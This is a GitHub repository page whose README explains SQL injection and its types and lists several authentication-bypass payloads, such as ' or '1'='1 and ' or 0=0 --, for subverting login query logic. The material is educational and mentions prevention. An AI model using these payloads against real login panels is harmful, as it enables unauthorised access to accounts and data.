Skip to content

SQL Injection is a cyber attack where hackers insert malicious SQL code into input fields in web applications to gain unauthorized access to sensitive information. To prevent it, developers must implement secure coding practices and input validation.

Notifications You must be signed in to change notification settings

who0am1too/SQL-Injection

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 

Repository files navigation

SQL-Injection

SQL Injection is a cyber attack where hackers insert malicious SQL code into input fields in web applications to gain unauthorized access to sensitive information. To prevent it, developers must implement secure coding practices and input validation.

Types of SQL Injection

1.In Band 2.Out of Band 3.Inferential or Blind

Authentication Bypass(Subverting Query Logic)

In short,SQL injection vulnerability allowing login bypass.To authenticate login panel some true conditions have been used. Some payloads: ' or '1'='1

' or 0=0 --

" or 0=0 --

' or 0=0 #

" or 0=0 #

'="or'

hi" or 1=1 --

hi' or 1=1 --

About

SQL Injection is a cyber attack where hackers insert malicious SQL code into input fields in web applications to gain unauthorized access to sensitive information. To prevent it, developers must implement secure coding practices and input validation.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published